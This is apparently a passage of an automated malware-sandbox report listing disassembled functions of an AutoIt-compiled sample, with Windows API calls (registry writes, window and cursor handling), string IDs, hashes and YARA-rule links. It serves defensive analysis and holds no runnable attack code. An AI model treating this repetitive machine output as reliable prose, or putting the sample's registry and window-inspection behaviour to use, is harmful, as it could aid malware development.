                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E478C9
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00E478E9
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E47904
                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E47918
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E47930
                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00E47956
                                                                                                                  • GetMonitorInfoW.USER32 ref: 00E47970
                                                                                                                  • CopyRect.USER32(?,?), ref: 00E47987
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00E479F2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                  • Opcode ID: b6140b2e8df4833ffa93d0d3b66d845dbe30731ad29c731ef8ae826f9aa7a11c
                                                                                                                  • Instruction ID: a07340034b67dd0c9d344984e706a5b423a442905a8bd8e236e212533ab2de0d
                                                                                                                  • Opcode Fuzzy Hash: b6140b2e8df4833ffa93d0d3b66d845dbe30731ad29c731ef8ae826f9aa7a11c
                                                                                                                  • Instruction Fuzzy Hash: 36B18D71608340AFDB04DF65D948B6EBBE5FF88314F00891DF599AB291DB70E804CBA6
                                                                                                                  Function 00DFA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DFA939
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00DFA941
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DFA96C
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00DFA974
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00DFA999
                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DFA9B6
                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00DFA9C6
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DFA9F9
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DFAA0D
                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00DFAA2B
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00DFAA47
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFAA52
                                                                                                                    • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
                                                                                                                    • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00DFAB87), ref: 00DFAA79
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                  • Opcode ID: 8215fe2606c3ba72a74ce7cb437b9d758c41c8ab07c9c9baa84121db26172d6b
                                                                                                                  • Instruction ID: 8a9557c290e4415a64afd849f8eb042feda4c353e4615bf525d84f973f90595c
                                                                                                                  • Opcode Fuzzy Hash: 8215fe2606c3ba72a74ce7cb437b9d758c41c8ab07c9c9baa84121db26172d6b
                                                                                                                  • Instruction Fuzzy Hash: DFB1BF71A0420ADFDB14DFA9DC45BAE7BB4FB48315F168229FA05E7290D7B0E844CB61
                                                                                                                  Function 00E26CE9 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 178COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                  • API String ID: 390803403-1459072770
                                                                                                                  • Opcode ID: 0247368800d7a646e2ba0cad2504c23f138ff007c43c19f8d032bc3698a9d9df
                                                                                                                  • Instruction ID: 593f87987ca3b74e3c698ed2cc807523e3a2d37fc3c525a5700439b79eeaf181
                                                                                                                  • Opcode Fuzzy Hash: 0247368800d7a646e2ba0cad2504c23f138ff007c43c19f8d032bc3698a9d9df
                                                                                                                  • Instruction Fuzzy Hash: 7F410472A042147BEB00BB64DC47EBF77BCEF01314F14116AF901B6182EB74AA0192B2
                                                                                                                  Function 00E43639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E43735
                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E7DC00,00000000,?,00000000,?,?), ref: 00E437A3
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E437EB
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E43874
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00E43B94
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E43BA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                  • Opcode ID: 2aeecea7af11ead484c513a97ce2daeb368bfbc4084bf6c8889a72da410e053e
                                                                                                                  • Instruction ID: 8aafc67fe2bd316eeb4f658f758828625bc0cfa3db13946b79151b3ebfb4976c
                                                                                                                  • Opcode Fuzzy Hash: 2aeecea7af11ead484c513a97ce2daeb368bfbc4084bf6c8889a72da410e053e
                                                                                                                  • Instruction Fuzzy Hash: 390259756046019FCB14EF25D855A2EB7E5FF88724F05845DF98AAB3A2CB30ED01CBA1
                                                                                                                  Function 00E46BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00E46C56
                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E46D16
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                  • Opcode ID: 96c251010a45285f7d75f577ec69442508efcb2b868f5a45e52d3f3d2aed6d45
                                                                                                                  • Instruction ID: 0ed81fc3c69ce157d316526e3959ecc0b9791f608467882f28c88701414c6e59
                                                                                                                  • Opcode Fuzzy Hash: 96c251010a45285f7d75f577ec69442508efcb2b868f5a45e52d3f3d2aed6d45
                                                                                                                  • Instruction Fuzzy Hash: 02A18F702042459BCB14FF20D851ABAB3E5FF85314F149969B9966B3D2DF30ED0ACB62
                                                                                                                  Function 00E1CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00E1CF91
                                                                                                                  • __swprintf.LIBCMT ref: 00E1D032
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D045
                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E1D09A
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D0D6
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00E1D10D
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00E1D15F
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E1D195
                                                                                                                  • GetParent.USER32(?), ref: 00E1D1B3
                                                                                                                  • ScreenToClient.USER32(00000000), ref: 00E1D1BA
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00E1D234
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D248
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00E1D26E
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D282
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                  • String ID: %s%u
                                                                                                                  • API String ID: 3119225716-679674701
                                                                                                                  • Opcode ID: 0deec621af7e7091671387ba01f2b91653e25b9583df318265cad2ad4ab18bfd
                                                                                                                  • Instruction ID: 76860fc375289e9c4ff0841dadf9d90812f0c62977f92bf12be17e7f8b50a668
                                                                                                                  • Opcode Fuzzy Hash: 0deec621af7e7091671387ba01f2b91653e25b9583df318265cad2ad4ab18bfd
                                                                                                                  • Instruction Fuzzy Hash: F4A1BF71608202AFD715DF64CC84BEAB7E8FF48358F005519F9A9E2190D730EA85CBA1
                                                                                                                  Function 00E1D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00E1D8EB
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D8FC
                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E1D924
                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00E1D941
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D95F
                                                                                                                  • _wcsstr.LIBCMT ref: 00E1D970
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00E1D9A8
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1D9B8
                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E1D9DF
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00E1DA28
                                                                                                                  • _wcscmp.LIBCMT ref: 00E1DA38
                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00E1DA60
                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00E1DAC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                  • Opcode ID: 7d2e1d89ae7245354abc27c8a217b2f8db65b4482ca7cec18188b90201d86e6e
                                                                                                                  • Instruction ID: de1b25c38ccfcb1dfddd5ad3e3db356fc7fc20e68cfc40a8d22003b421526f39
                                                                                                                  • Opcode Fuzzy Hash: 7d2e1d89ae7245354abc27c8a217b2f8db65b4482ca7cec18188b90201d86e6e
                                                                                                                  • Instruction Fuzzy Hash: 7481A13110C3459BDB05DF10DC81FAA7BE8EF84758F046469FD8AAA096DB70ED85CBA1
                                                                                                                  Function 00E1D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                  • Opcode ID: 14bbe3353c4f17b49e747496bab980a7e540fd24604822b7412522a408a2ae16
                                                                                                                  • Instruction ID: 863494bb091d45143066648ca8364b78a663559eb7153614f2b1bf3b5a2a39ae
                                                                                                                  • Opcode Fuzzy Hash: 14bbe3353c4f17b49e747496bab980a7e540fd24604822b7412522a408a2ae16
                                                                                                                  • Instruction Fuzzy Hash: 77318C32A48349BADF18FA61DD43FEEB3A49F20744F202129F541B10D1FB61AE84C6B1
                                                                                                                  Function 00E1EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00E1EAB0
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E1EAC2
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00E1EAD9
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00E1EAEE
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00E1EAF4
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E1EB04
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00E1EB0A
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E1EB2B
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E1EB45
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00E1EB4E
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00E1EBB9
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E1EBBF
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E1EBC6
                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E1EC12
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00E1EC1F
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E1EC44
                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E1EC6F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3869813825-0
                                                                                                                  • Opcode ID: 14df0ee992ae41d3891c27a93c48d51aa8c4a7a5c284bb8a9f9d152e7e1402d8
                                                                                                                  • Instruction ID: f16985c3279339d2d5cb73a1666ff2c8dd876691339c61e93d6aad4d4205cc5d
                                                                                                                  • Opcode Fuzzy Hash: 14df0ee992ae41d3891c27a93c48d51aa8c4a7a5c284bb8a9f9d152e7e1402d8
                                                                                                                  • Instruction Fuzzy Hash: FE513C71A04709AFDB209FA9DD89EAFBBF5FF04708F004918F556B26A0C7B4A944CB10
                                                                                                                  Function 00E379B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00E379C6
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00E379D1
                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00E379DC
                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00E379E7
                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00E379F2
                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00E379FD
                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00E37A08
                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00E37A13
                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00E37A1E
                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00E37A29
                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00E37A34
                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00E37A3F
                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00E37A4A
                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00E37A55
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00E37A60
                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00E37A6B
                                                                                                                  • GetCursorInfo.USER32(?), ref: 00E37A7B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$Load$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2577412497-0
                                                                                                                  • Opcode ID: be9483a671097e9a3677483fb65406a286a93592fce0e0093a8a02829eba7e82
                                                                                                                  • Instruction ID: 453debed5907c8411e8d20df4ea624eea8de447817ff7b33276ebecbb0e65e6e
                                                                                                                  • Opcode Fuzzy Hash: be9483a671097e9a3677483fb65406a286a93592fce0e0093a8a02829eba7e82
                                                                                                                  • Instruction Fuzzy Hash: F03116B0D0831E6ADB609FB68C8995FBEE8FF04754F504526E54DF7180DA78A500CFA1
                                                                                                                  Function 00DEC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DEC8B7,?,00002000,?,?,00000000,?,00DE419E,?,?,?,00E7DC00), ref: 00DFE984
                                                                                                                    • Part of subcall function 00DE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DE53B1,?,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE662F
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DEC93E
                                                                                                                    • Part of subcall function 00E01DFC: __wsplitpath_helper.LIBCMT ref: 00E01E3C
                                                                                                                  • _wcscpy.LIBCMT ref: 00DEC953
                                                                                                                  • _wcscat.LIBCMT ref: 00DEC968
